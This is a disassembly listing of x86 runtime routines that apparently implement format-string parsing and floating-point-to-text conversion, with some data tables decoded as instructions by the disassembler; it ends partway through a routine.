var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 4000867B SIZE 0000000F BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFF94h
push ebx
xor ebx, ebx
mov [ebp+var_14], ebx
push ebx
push esi
push edi
mov edi, eax
mov esi, ecx
xor eax, eax
mov [ebp+var_4], eax
add ecx, [ebp+arg_8]
mov [ebp+var_8], edi
xor eax, eax
mov [ebp+var_C], eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
loc_4000833D: ; CODE XREF: sub_40008314+DD�j
or edx, edx
jz short loc_4000834E
loc_40008341: ; CODE XREF: sub_40008314+38�j
cmp esi, ecx
jz short loc_4000834E
lodsb
cmp al, 25h
jz short loc_40008358
loc_4000834A: ; CODE XREF: sub_40008314+4B�j
stosb
dec edx
jnz short loc_40008341
loc_4000834E: ; CODE XREF: sub_40008314+2B�j
; sub_40008314+2F�j ...
mov eax, edi
sub eax, [ebp+var_8]
jmp loc_4000867B
; ---------------------------------------------------------------------------
loc_40008358: ; CODE XREF: sub_40008314+34�j
cmp esi, ecx
jz short loc_4000834E
lodsb
cmp al, 25h
jz short loc_4000834A
lea ebx, [esi-2]
mov [ebp+var_18], ebx
loc_40008367: ; CODE XREF: sub_40008314+70�j
mov [ebp+var_19], al
cmp al, 2Dh
jnz short loc_40008373
cmp esi, ecx
jz short loc_4000834E
lodsb
loc_40008373: ; CODE XREF: sub_40008314+58�j
call sub_400083F6
cmp al, 3Ah
jnz short loc_40008386
mov [ebp+var_C], ebx
cmp esi, ecx
jz short loc_4000834E
lodsb
jmp short loc_40008367
; ---------------------------------------------------------------------------
loc_40008386: ; CODE XREF: sub_40008314+66�j
mov [ebp+var_20], ebx
mov ebx, 0FFFFFFFFh
cmp al, 2Eh
jnz short loc_4000839C
cmp esi, ecx
jz short loc_4000834E
lodsb
call sub_400083F6
loc_4000839C: ; CODE XREF: sub_40008314+7C�j
mov [ebp+var_24], ebx
mov [ebp+var_28], esi
push ecx
push edx
call sub_4000843E
pop edx
mov ebx, [ebp+var_20]
sub ebx, ecx
jnb short loc_400083B3
xor ebx, ebx
loc_400083B3: ; CODE XREF: sub_40008314+9B�j
cmp [ebp+var_19], 2Dh
jnz short loc_400083C3
sub edx, ecx
jnb short loc_400083C1
add ecx, edx
xor edx, edx
loc_400083C1: ; CODE XREF: sub_40008314+A7�j
rep movsb
loc_400083C3: ; CODE XREF: sub_40008314+A3�j
xchg ebx, ecx
sub edx, ecx
jnb short loc_400083CD
add ecx, edx
xor edx, edx
loc_400083CD: ; CODE XREF: sub_40008314+B3�j
mov al, 20h
rep stosb
xchg ebx, ecx
sub edx, ecx
jnb short loc_400083DB
add ecx, edx
xor edx, edx
loc_400083DB: ; CODE XREF: sub_40008314+C1�j
rep movsb
cmp [ebp+var_10], 0
jz short loc_400083ED
push edx
lea eax, [ebp+var_10]
call sub_40008308
pop edx
loc_400083ED: ; CODE XREF: sub_40008314+CD�j
pop ecx
mov esi, [ebp+var_28]
jmp loc_4000833D
sub_40008314 endp
; =============== S U B R O U T I N E =======================================
sub_400083F6 proc near ; CODE XREF: sub_40008314:loc_40008373�p
; sub_40008314+83�p
xor ebx, ebx
cmp al, 2Ah
jz short loc_4000841E
loc_400083FC: ; CODE XREF: sub_400083F6+20�j
cmp al, 30h
jb short locret_4000843D
cmp al, 39h
ja short locret_4000843D
imul ebx, 0Ah
sub al, 30h
movzx eax, al
add ebx, eax
cmp esi, ecx
jz short loc_40008418
lodsb
jmp short loc_400083FC
; ---------------------------------------------------------------------------
loc_40008418: ; CODE XREF: sub_400083F6+1D�j
; sub_400083F6+44�j
pop eax
jmp loc_4000834E
; ---------------------------------------------------------------------------
loc_4000841E: ; CODE XREF: sub_400083F6+4�j
mov eax, [ebp-0Ch]
cmp eax, [ebp+8]
jg short loc_40008438
inc dword ptr [ebp-0Ch]
mov ebx, [ebp+0Ch]
cmp byte ptr [ebx+eax*8+4], 0
mov ebx, [ebx+eax*8]
jz short loc_40008438
xor ebx, ebx
loc_40008438: ; CODE XREF: sub_400083F6+2E�j
; sub_400083F6+3E�j
cmp esi, ecx
jz short loc_40008418
lodsb
locret_4000843D: ; CODE XREF: sub_400083F6+8�j
; sub_400083F6+C�j
retn
sub_400083F6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4000843E proc near ; CODE XREF: sub_40008314+90�p
and al, 0DFh
mov cl, al
mov eax, 1
mov ebx, [ebp-0Ch]
cmp ebx, [ebp+8]
jg short loc_400084AB
inc dword ptr [ebp-0Ch]
mov esi, [ebp+0Ch]
lea esi, [esi+ebx*8]
mov eax, [esi]
movzx edx, byte ptr [esi+4]
jmp ds:off_40008465[edx*4]
; ---------------------------------------------------------------------------
off_40008465 dd offset loc_400084F6 ; DATA XREF: sub_4000843E+20�r
dd offset loc_400084A9
dd offset loc_4000852F
dd offset loc_400085F6
dd offset loc_4000855F
dd offset loc_400085D7
dd offset loc_400085B7
dd offset loc_400084A9
dd offset loc_400084A9
dd offset loc_400084A9
dd offset loc_40008570
dd offset loc_4000859B
dd offset loc_400085F2
dd offset loc_4000853E
dd offset loc_400084A9
dd offset loc_40008577
dd offset loc_400084C0
; ---------------------------------------------------------------------------
loc_400084A9: ; CODE XREF: sub_4000843E+20�j
; sub_4000843E+B6�j ...
xor eax, eax
loc_400084AB: ; CODE XREF: sub_4000843E+F�j
call sub_4000866B
mov edx, [ebp-18h]
mov ecx, [ebp-28h]
sub ecx, edx
mov ebx, [ebp-4]
call sub_4000828C
loc_400084C0: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+67�o
lea esi, [ebp-49h]
mov edx, [ebp-24h]
cmp edx, 20h
jbe short loc_400084CD
xor edx, edx
loc_400084CD: ; CODE XREF: sub_4000843E+8B�j
mov ebx, ecx
sub cl, 44h
jz sub_40007CB8
mov ecx, 10h
cmp bl, 58h
jz sub_40007CB8
mov ecx, 0Ah
cmp bl, 55h
jz sub_40007CB8
jmp short loc_400084A9
; ---------------------------------------------------------------------------
loc_400084F6: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E:off_40008465�o
lea esi, [ebp-59h]
mov edx, [ebp-24h]
mov ebx, ecx
cmp edx, 10h
jbe short loc_40008505
xor edx, edx
loc_40008505: ; CODE XREF: sub_4000843E+C3�j
sub cl, 44h
jz sub_40007C4C
mov ecx, 10h
cmp bl, 58h
jz sub_40007C4C
mov ecx, 0Ah
cmp bl, 55h
jz sub_40007C4C
jmp loc_400084A9
; ---------------------------------------------------------------------------
loc_4000852F: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+2F�o
cmp cl, 53h
jnz loc_400084A9
mov ecx, 1
retn
; ---------------------------------------------------------------------------
loc_4000853E: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+5B�o
cmp cl, 53h
jnz loc_400084A9
cmp word ptr [eax], 1
jbe short loc_4000855C
mov edx, eax
lea eax, [ebp-10h]
call sub_400082E4
mov esi, [ebp-10h]
jmp short loc_400085A6
; ---------------------------------------------------------------------------
loc_4000855C: ; CODE XREF: sub_4000843E+10D�j
; sub_4000843E+16A�j
xor ecx, ecx
retn
; ---------------------------------------------------------------------------
loc_4000855F: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+37�o
cmp cl, 53h
jnz loc_400084A9
mov esi, eax
lodsb
movzx ecx, al
jmp short loc_400085AD
; ---------------------------------------------------------------------------
loc_40008570: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+4F�o
mov esi, offset sub_40004AAC
jmp short loc_4000857C
; ---------------------------------------------------------------------------
loc_40008577: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+63�o
mov esi, offset sub_40004B0C
loc_4000857C: ; CODE XREF: sub_4000843E+137�j
add esi, [ebp-4]
cmp cl, 53h
jnz loc_400084A9
mov edx, eax
lea eax, [ebp-14h]
push ebx
mov ebx, [ebp-4]
call esi
pop ebx
mov esi, [ebp-14h]
mov eax, esi
jmp short loc_400085A6
; ---------------------------------------------------------------------------
loc_4000859B: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+53�o
cmp cl, 53h
jnz loc_400084A9
mov esi, eax
loc_400085A6: ; CODE XREF: sub_4000843E+11C�j
; sub_4000843E+15B�j
or esi, esi
jz short loc_4000855C
mov ecx, [esi-4]
loc_400085AD: ; CODE XREF: sub_4000843E+130�j
cmp ecx, [ebp-24h]
ja short loc_400085B3
retn
; ---------------------------------------------------------------------------
loc_400085B3: ; CODE XREF: sub_4000843E+172�j
mov ecx, [ebp-24h]
retn
; ---------------------------------------------------------------------------
loc_400085B7: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+3F�o
cmp cl, 53h
jnz loc_400084A9
mov esi, eax
push edi
mov edi, eax
xor al, al
mov ecx, [ebp-24h]
jecxz short loc_400085D1
repne scasb
jnz short loc_400085D1
dec edi
loc_400085D1: ; CODE XREF: sub_4000843E+18C�j
; sub_4000843E+190�j
mov ecx, edi
sub ecx, esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_400085D7: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+3B�o
cmp cl, 50h
jnz loc_400084A9
mov edx, 8
mov ecx, 10h
lea esi, [ebp-59h]
jmp sub_40007C4C
; ---------------------------------------------------------------------------
loc_400085F2: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+57�o
mov bh, 1
jmp short loc_400085F8
; ---------------------------------------------------------------------------
loc_400085F6: ; CODE XREF: sub_4000843E+20�j
; DATA XREF: sub_4000843E+33�o
mov bh, 0
loc_400085F8: ; CODE XREF: sub_4000843E+1B6�j
mov esi, eax
mov bl, 0
cmp cl, 47h
jz short loc_40008640
mov bl, 1
cmp cl, 45h
jz short loc_40008640
mov bl, 2
cmp cl, 46h
jz short loc_40008621
mov bl, 3
cmp cl, 4Eh
jz short loc_40008621
cmp cl, 4Dh
jnz loc_400084A9
mov bl, 4
loc_40008621: ; CODE XREF: sub_4000843E+1CF�j
; sub_4000843E+1D6�j
mov eax, 12h
mov edx, [ebp-24h]
cmp edx, eax
jbe short loc_40008652
mov edx, 2
cmp cl, 4Dh
jnz short loc_40008652
movzx edx, ds:byte_4001E810
jmp short loc_40008652
; ---------------------------------------------------------------------------
loc_40008640: ; CODE XREF: sub_4000843E+1C1�j
; sub_4000843E+1C8�j
mov eax, [ebp-24h]
mov edx, 3
cmp eax, 12h
jbe short loc_40008652
mov eax, 0Fh
loc_40008652: ; CODE XREF: sub_4000843E+1ED�j
; sub_4000843E+1F7�j ...
push ebx
push eax
push edx
lea eax, [ebp-69h]
mov edx, esi
movzx ecx, bh
mov ebx, [ebp-4]
call sub_40008800
mov ecx, eax
lea esi, [ebp-69h]
retn
sub_4000843E endp
; =============== S U B R O U T I N E =======================================
sub_4000866B proc near ; CODE XREF: sub_4000843E:loc_400084AB�p
; sub_40008314:loc_4000867B�p
push ebx
push eax
lea eax, [ebp-14h]
mov ebx, [ebp-4]
call sub_40004884
pop eax
pop ebx
retn
sub_4000866B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40008314
loc_4000867B: ; CODE XREF: sub_40008314+3F�j
call sub_4000866B
pop edi
pop esi
pop ebx
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_40008314
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000868C proc near ; CODE XREF: sub_4000ADE0+169�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, ecx
mov edi, edx
mov ebx, eax
test ebx, ebx
jz short loc_400086C3
test esi, esi
jz short loc_400086C3
mov eax, esi
call sub_4000815C
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
mov ecx, esi
mov eax, ebx
mov edx, edi
call sub_40008314
mov byte ptr [ebx+eax], 0
mov eax, ebx
jmp short loc_400086C5
; ---------------------------------------------------------------------------
loc_400086C3: ; CODE XREF: sub_4000868C+E�j
; sub_4000868C+12�j
xor eax, eax
loc_400086C5: ; CODE XREF: sub_4000868C+35�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_4000868C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400086CC proc near ; CODE XREF: sub_4000B06C+34�p
; sub_4000B128+41�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
xchg eax, ecx
xchg edx, ecx
call sub_400086E0
pop ebp
retn 4
sub_400086CC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400086E0 proc near ; CODE XREF: sub_400086CC+A�p
; sub_40015EE4+74�p
var_100C = byte ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFF004h
push eax
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov edi, eax
mov ebx, 1000h
mov edx, [ebp+var_4]
mov eax, edx
test eax, eax
jz short loc_4000870B
sub eax, 4
mov eax, [eax]
loc_4000870B: ; CODE XREF: sub_400086E0+24�j
cmp eax, 0C00h
jge short loc_4000873E
mov eax, edx
test eax, eax
jz short loc_4000871D
sub eax, 4
mov eax, [eax]
loc_4000871D: ; CODE XREF: sub_400086E0+36�j
push eax
mov eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
lea eax, [ebp+var_100C]
mov edx, 0FFFh
call sub_40008314
mov [ebp+var_C], eax
jmp short loc_4000874E
; ---------------------------------------------------------------------------
loc_4000873E: ; CODE XREF: sub_400086E0+30�j
mov eax, edx
test eax, eax
jz short loc_40008749
sub eax, 4
mov eax, [eax]
loc_40008749: ; CODE XREF: sub_400086E0+62�j
mov ebx, eax
mov [ebp+var_C], ebx
loc_4000874E: ; CODE XREF: sub_400086E0+5C�j
mov eax, ebx
dec eax
cmp eax, [ebp+var_C]
jg short loc_400087A3
jmp short loc_4000878F
; ---------------------------------------------------------------------------
loc_40008758: ; CODE XREF: sub_400086E0+B5�j
add ebx, ebx
mov eax, edi
call sub_40004884
mov eax, edi
mov edx, ebx
call sub_40004F74
mov esi, [ebp+var_4]
test esi, esi
jz short loc_40008776
sub esi, 4
mov esi, [esi]
loc_40008776: ; CODE XREF: sub_400086E0+8F�j
push esi
mov eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
mov edx, ebx
dec edx
mov eax, [edi]
call sub_40008314
mov [ebp+var_C], eax
loc_4000878F: ; CODE XREF: sub_400086E0+76�j
mov eax, ebx
dec eax
cmp eax, [ebp+var_C]
jle short loc_40008758
mov eax, edi
mov edx, [ebp+var_C]
call sub_40004F74
jmp short loc_400087B3
; ---------------------------------------------------------------------------
loc_400087A3: ; CODE XREF: sub_400086E0+74�j
lea edx, [ebp+var_100C]
mov eax, edi
mov ecx, [ebp+var_C]
call sub_40004974
loc_400087B3: ; CODE XREF: sub_400086E0+C1�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_400086E0 endp
; =============== S U B R O U T I N E =======================================
sub_400087BC proc near ; CODE XREF: sub_40008909+8D�p
push esi
xor esi, esi
stosb
or bl, bl
jnz short loc_400087C8
xor edx, edx
jmp short loc_400087D2
; ---------------------------------------------------------------------------
loc_400087C8: ; CODE XREF: sub_400087BC+6�j
or edx, edx
jge short loc_400087D2
mov al, 2Dh
neg edx
jmp short loc_400087D8
; ---------------------------------------------------------------------------
loc_400087D2: ; CODE XREF: sub_400087BC+A�j
; sub_400087BC+E�j
or ah, ah
jz short loc_400087D9
mov al, ah
loc_400087D8: ; CODE XREF: sub_400087BC+14�j
stosb
loc_400087D9: ; CODE XREF: sub_400087BC+18�j
xchg eax, edx
push eax
mov ebx, esp
loc_400087DD: ; CODE XREF: sub_400087BC+32�j
; sub_400087BC+36�j
xor edx, edx
div flt_4001A870[esi]
add dl, 30h
mov [ebx], dl
inc ebx
dec ecx
or eax, eax
jnz short loc_400087DD
or ecx, ecx
jg short loc_400087DD
loc_400087F4: ; CODE XREF: sub_400087BC+3E�j
dec ebx
mov al, [ebx]
stosb
cmp ebx, esp
jnz short loc_400087F4
pop eax
pop esi
retn
sub_400087BC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40008800 proc near ; CODE XREF: sub_4000843E+222�p
; sub_40008E14+17�p ...
var_2C = word ptr -2Ch
var_29 = byte ptr -29h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
; FUNCTION CHUNK AT 40008ACD SIZE 00000006 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFD4h
push edi
push esi
push ebx
mov [ebp+var_4], eax
mov al, ds:byte_4001E80F
mov [ebp+var_5], al
mov al, ds:byte_4001E80E
mov [ebp+var_6], al
mov eax, ds:dword_4001E808
mov [ebp+var_C], eax
mov al, ds:byte_4001E80C
mov [ebp+var_D], al
mov al, ds:byte_4001E80D
mov [ebp+var_E], al
mov [ebp+var_14], 0
mov eax, 13h
cmp cl, 0
jnz short loc_4000885C
mov eax, [ebp+arg_4]
cmp eax, 2
jge short loc_40008852
mov eax, 2
loc_40008852: ; CODE XREF: sub_40008800+4B�j
cmp eax, 12h
jle short loc_4000885C
mov eax, 12h
loc_4000885C: ; CODE XREF: sub_40008800+43�j
; sub_40008800+55�j
mov [ebp+arg_4], eax
push eax
mov eax, 270Fh
cmp [ebp+arg_8], 2
jb short loc_4000886E
mov eax, [ebp+arg_0]
loc_4000886E: ; CODE XREF: sub_40008800+69�j
push eax
lea eax, [ebp+var_2C]
call sub_40008AD4
mov edi, [ebp+var_4]
movzx eax, [ebp+var_2C]
sub eax, 7FFFh
cmp eax, 2
jnb short loc_400088A2
mov ecx, eax
call sub_400088FF
lea esi, dword_400088F0[ecx+ecx*2]
add esi, [ebp+var_14]
mov ecx, 3
rep movsb
jmp short loc_400088CF
; ---------------------------------------------------------------------------
loc_400088A2: ; CODE XREF: sub_40008800+86�j
lea esi, [ebp+var_29]
movzx ebx, [ebp+arg_8]
cmp bl, 1
jz short loc_400088BE
cmp bl, 4
ja short loc_400088BC
movsx eax, [ebp+var_2C]
cmp eax, [ebp+arg_4]
jle short loc_400088BE
loc_400088BC: ; CODE XREF: sub_40008800+B1�j
mov bl, 0
loc_400088BE: ; CODE XREF: sub_40008800+AC�j
; sub_40008800+BA�j
lea ebx, off_400088DC[ebx*4]
add ebx, [ebp+var_14]
mov ebx, [ebx]
add ebx, [ebp+var_14]
call ebx
loc_400088CF: ; CODE XREF: sub_40008800+A0�j
mov eax, edi
sub eax, [ebp+var_4]
pop ebx
pop esi
pop edi
jmp loc_40008ACD
sub_40008800 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
off_400088DC dd offset sub_40008909 ; DATA XREF: sub_40008800:loc_400088BE�o
dd offset loc_40008965
dd offset sub_4000899C
dd offset sub_4000899C
dd offset sub_40008A06
dword_400088F0 dd 4E464E49h ; ---------------------------------------------------------------------------
inc ecx
dec esi
; =============== S U B R O U T I N E =======================================
sub_400088F6 proc near ; CODE XREF: sub_40008909+61�p
; sub_40008909:loc_40008978�p ...
lodsb
or al, al
jnz short locret_400088FE
mov al, 30h
dec esi
locret_400088FE: ; CODE XREF: sub_400088F6+3�j
retn
sub_400088F6 endp
; =============== S U B R O U T I N E =======================================
sub_400088FF proc near ; CODE XREF: sub_40008800+8A�p
; sub_40008909�p ...
cmp byte ptr [ebp-2Ah], 0
jz short locret_40008908
mov al, 2Dh
stosb
locret_40008908: ; CODE XREF: sub_400088FF+4�j
retn
sub_400088FF endp
; =============== S U B R O U T I N E =======================================
sub_40008909 proc near ; DATA XREF: .text:off_400088DC�o
call sub_400088FF
movsx ecx, word ptr [ebp-2Ch]
xor edx, edx
cmp ecx, [ebp+0Ch]
jg short loc_40008936
cmp ecx, 0FFFFFFFDh
jl short loc_40008936
or ecx, ecx
jg short loc_4000893C
mov al, 30h
stosb
cmp byte ptr [esi], 0
jz short locret_40008964
mov al, [ebp-5]
stosb
neg ecx
mov al, 30h
rep stosb
jmp short loc_40008950
; ---------------------------------------------------------------------------
loc_40008936: ; CODE XREF: sub_40008909+E�j
; sub_40008909+13�j
mov ecx, 1
inc edx
loc_4000893C: ; CODE XREF: sub_40008909+17�j
; sub_40008909+39�j
lodsb
or al, al
jz short loc_40008958
stosb
loop loc_4000893C
lodsb
or al, al
jz short loc_4000895C
mov ah, al
mov al, [ebp-5]
stosw
loc_40008950: ; CODE XREF: sub_40008909+2B�j
; sub_40008909+4D�j
lodsb
or al, al
jz short loc_4000895C
stosb
jmp short loc_40008950
; ---------------------------------------------------------------------------
loc_40008958: ; CODE XREF: sub_40008909+36�j
mov al, 30h
rep stosb
loc_4000895C: ; CODE XREF: sub_40008909+3E�j
; sub_40008909+4A�j
or edx, edx
jz short locret_40008964
xor eax, eax
jmp short loc_40008982
; ---------------------------------------------------------------------------
locret_40008964: ; CODE XREF: sub_40008909+1F�j
; sub_40008909+55�j
retn
; ---------------------------------------------------------------------------
loc_40008965: ; DATA XREF: .text:400088E0�o
call sub_400088FF
call sub_400088F6
mov ah, [ebp-5]
stosw
mov ecx, [ebp+0Ch]
dec ecx
loc_40008978: ; CODE XREF: sub_40008909+75�j
call sub_400088F6
stosb
loop loc_40008978
mov ah, 2Bh
loc_40008982: ; CODE XREF: sub_40008909+59�j
mov ecx, [ebp+8]
cmp ecx, 4
jbe short loc_4000898C
xor ecx, ecx
loc_4000898C: ; CODE XREF: sub_40008909+7F�j
mov al, 45h
mov bl, [ebp-29h]
movsx edx, word ptr [ebp-2Ch]
dec edx
call sub_400087BC
retn
sub_40008909 endp
; =============== S U B R O U T I N E =======================================
sub_4000899C proc near ; DATA XREF: .text:400088E4�o
; .text:400088E8�o
call sub_400088FF
loc_400089A1: ; CODE XREF: sub_40008A06:loc_40008A4F�p
mov edx, [ebp+8]
cmp edx, 12h
jb short loc_400089AE
mov edx, 12h
loc_400089AE: ; CODE XREF: sub_4000899C+B�j
movsx ecx, word ptr [ebp-2Ch]
or ecx, ecx
jg short loc_400089BB
mov al, 30h
stosb
jmp short loc_400089E5
; ---------------------------------------------------------------------------
loc_400089BB: ; CODE XREF: sub_4000899C+18�j
xor ebx, ebx
cmp byte ptr [ebp+10h], 2
jz short loc_400089CD
mov eax, ecx
dec eax
mov bl, 3
div bl
mov bl, ah
inc ebx
loc_400089CD: ; CODE XREF: sub_4000899C+25�j
; sub_4000899C+3B�j ...
call sub_400088F6
stosb
dec ecx
jz short loc_400089E5
dec ebx
jnz short loc_400089CD
mov al, [ebp-6]
test al, al
jz short loc_400089CD
stosb
mov bl, 3
jmp short loc_400089CD
; ---------------------------------------------------------------------------
loc_400089E5: ; CODE XREF: sub_4000899C+1D�j
; sub_4000899C+38�j
or edx, edx
jz short locret_40008A05
mov al, [ebp-5]
test al, al
jz short loc_400089F1
stosb
loc_400089F1: ; CODE XREF: sub_4000899C+52�j
jecxz short loc_400089FC
mov al, 30h
loc_400089F5: ; CODE XREF: sub_4000899C+5E�j
stosb
dec edx
jz short locret_40008A05
inc ecx
jnz short loc_400089F5
loc_400089FC: ; CODE XREF: sub_4000899C:loc_400089F1�j
; sub_4000899C+67�j
call sub_400088F6
stosb
dec edx
jnz short loc_400089FC
locret_40008A05: ; CODE XREF: sub_4000899C+4B�j
; sub_4000899C+5B�j
retn
sub_4000899C endp
; =============== S U B R O U T I N E =======================================
sub_40008A06 proc near ; DATA XREF: .text:400088EC�o
xor ebx, ebx
mov bl, [ebp-0Dh]
mov ecx, 3
cmp byte ptr [ebp-2Ah], 0
jz short loc_40008A1E
mov bl, [ebp-0Eh]
mov ecx, 40Fh
loc_40008A1E: ; CODE XREF: sub_40008A06+E�j
cmp bl, cl
jbe short loc_40008A24
mov bl, cl
loc_40008A24: ; CODE XREF: sub_40008A06+1A�j
add bl, ch
lea ebx, dword_40008A69[ebx+ebx*4]
add ebx, [ebp-14h]
mov ecx, 5
loc_40008A35: ; CODE XREF: sub_40008A06+51�j
mov al, [ebx]
cmp al, 40h
jz short locret_40008A59
push ecx
push ebx
cmp al, 24h
jz short loc_40008A48
cmp al, 2Ah
jz short loc_40008A4F
stosb
jmp short loc_40008A54
; ---------------------------------------------------------------------------
loc_40008A48: ; CODE XREF: sub_40008A06+39�j
call sub_40008A5A
jmp short loc_40008A54
; ---------------------------------------------------------------------------
loc_40008A4F: ; CODE XREF: sub_40008A06+3D�j
call loc_400089A1
loc_40008A54: ; CODE XREF: sub_40008A06+40�j
; sub_40008A06+47�j
pop ebx
pop ecx
inc ebx
loop loc_40008A35
locret_40008A59: ; CODE XREF: sub_40008A06+33�j
retn
sub_40008A06 endp
; =============== S U B R O U T I N E =======================================
sub_40008A5A proc near ; CODE XREF: sub_40008A06:loc_40008A48�p
push esi
mov esi, [ebp-0Ch]
test esi, esi
jz short loc_40008A67
mov ecx, [esi-4]
rep movsb
loc_40008A67: ; CODE XREF: sub_40008A5A+6�j
pop esi
retn
sub_40008A5A endp
; ---------------------------------------------------------------------------
dword_40008A69 dd 40402A24h ; ---------------------------------------------------------------------------
inc eax
sub ah, [eax+eax*2]
inc eax
inc eax
and al, 20h
sub al, [eax+40h]
sub ah, [eax]
and al, 40h
inc eax
sub [edx+ebp], ah
sub [eax+2Dh], eax
and al, 2Ah
inc eax
inc eax
and al, 2Dh
sub al, [eax+40h]
and al, 2Ah
sub eax, 2A284040h
and al, 29h
inc eax
sub eax, 4040242Ah
sub ch, ds:2A404024h
and al, 2Dh
inc eax
inc eax
sub eax, 4024202Ah
sub eax, 402A2024h
sub ah, [eax]
and al, 2Dh
inc eax
and al, 20h
sub ch, ds:2D202440h
sub al, [eax+2Ah]
sub eax, 28402420h
and al, 20h
sub ch, [ecx]
sub [edx], ch
and [ecx+ebp], ah
; START OF FUNCTION CHUNK FOR sub_40008800
loc_40008ACD: ; CODE XREF: sub_40008800+D7�j
mov esp, ebp
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_40008800
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40008AD4 proc near ; CODE XREF: sub_40008800+72�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 40008CF7 SIZE 00000009 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push edi
push esi
push ebx
mov ebx, eax
mov esi, edx
mov [ebp+var_4], 0
cmp cl, 0
jz short loc_40008AF7
call sub_40008C23
jmp loc_40008CF7
; ---------------------------------------------------------------------------
loc_40008AF7: ; CODE XREF: sub_40008AD4+17�j
call sub_40008B01
jmp loc_40008CF7
sub_40008AD4 endp
; =============== S U B R O U T I N E =======================================
sub_40008B01 proc near ; CODE XREF: sub_40008AD4:loc_40008AF7�p
mov ax, [esi+8]
mov edx, eax
and eax, 7FFFh
jz short loc_40008B2C
cmp eax, 7FFFh
jnz short loc_40008B37
test word ptr [esi+6], 8000h
jz short loc_40008B2E
cmp dword ptr [esi], 0
jnz short loc_40008B2B
cmp dword ptr [esi+4], 80000000h
jz short loc_40008B2E
loc_40008B2B: ; CODE XREF: sub_40008B01+1F�j
inc eax
loc_40008B2C: ; CODE XREF: sub_40008B01+B�j
; sub_40008B01+AF�j
xor edx, edx
loc_40008B2E: ; CODE XREF: sub_40008B01+1A�j
; sub_40008B01+28�j
mov byte ptr [ebx+3], 0
jmp loc_40008C04
; ---------------------------------------------------------------------------
loc_40008B37: ; CODE XREF: sub_40008B01+12�j
fld tbyte ptr [esi]
sub eax, 3FFFh
imul eax, 4D10h
sar eax, 10h
inc eax
mov [ebp-8], eax
mov eax, 12h
sub eax, [ebp-8]
fabs
push ebx
mov ebx, [ebp-4]
call sub_40003870
pop ebx
frndint
mov edi, [ebp-4]
fld tbyte_4001A864[edi]
fcomp st(1)
fstsw word ptr [ebp-0Ah]
wait
test word ptr [ebp-0Ah], 4100h
jz short loc_40008B82
fidiv flt_4001A870[edi]
inc dword ptr [ebp-8]
loc_40008B82: ; CODE XREF: sub_40008B01+76�j
fbstp tbyte ptr [ebp-18h]
lea edi, [ebx+3]
mov edx, 9
wait
loc_40008B8E: ; CODE XREF: sub_40008B01+A0�j
mov al, [edx+ebp-19h]
mov ah, al
shr al, 4
and ah, 0Fh
add ax, 3030h
stosw
dec edx
jnz short loc_40008B8E
xor al, al
stosb
mov edi, [ebp-8]
add edi, [ebp+8]
jns short loc_40008BB5
xor eax, eax
jmp loc_40008B2C
; ---------------------------------------------------------------------------
loc_40008BB5: ; CODE XREF: sub_40008B01+AB�j
cmp edi, [ebp+0Ch]
jb short loc_40008BBD
mov edi, [ebp+0Ch]
loc_40008BBD: ; CODE XREF: sub_40008B01+B7�j
cmp edi, 12h
jnb short loc_40008BE9
cmp byte ptr [ebx+edi+3], 35h
jb short loc_40008BEE
loc_40008BC9: ; CODE XREF: sub_40008B01+D9�j
mov byte ptr [ebx+edi+3], 0
dec edi
js short loc_40008BDE
inc byte ptr [ebx+edi+3]
